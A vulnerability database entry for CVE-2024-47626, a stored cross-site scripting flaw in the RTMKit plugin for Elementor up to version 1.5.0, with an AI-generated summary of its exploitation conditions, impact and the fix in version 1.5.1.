CVE-2024-47626
Description
Stored XSS in RTMKit plugin for Elementor (<=1.5.0) allows privileged attackers to inject persistent scripts.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Stored XSS in RTMKit plugin for Elementor (<=1.5.0) allows privileged attackers to inject persistent scripts.
Vulnerability
Overview
The RTMKit plugin (rometheme-for-elementor) for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) due to improper neutralization of user input during web page generation [1]. This issue affects all versions up to and including 1.5.0 [1].
Exploitation
Details
Exploitation requires a privileged user role (such as a contributor or higher) to inject malicious scripts through the plugin's input fields. The injected script is then stored on the server and executed in the browsers of visitors viewing affected pages [1]. No direct authentication bypass is needed; the attacker must have valid credentials with sufficient permissions.
Impact
A successful attack allows the attacker to inject arbitrary HTML and JavaScript payloads, which can be used to redirect visitors, display advertisements, steal session cookies, or perform other client-side attacks [1]. This can compromise the integrity of the website and potentially lead to further exploitation.
Mitigation
The vulnerability has been patched in version 1.5.1 [1]. Users are strongly advised to update immediately. For those unable to update, implementing a Web Application Firewall (WAF) or asking the hosting provider for assistance may reduce risk, but updating is the recommended solution [1].
AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
1- Range: <=1.5.0
Patches
0No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
1News mentions
0No linked articles in our index yet.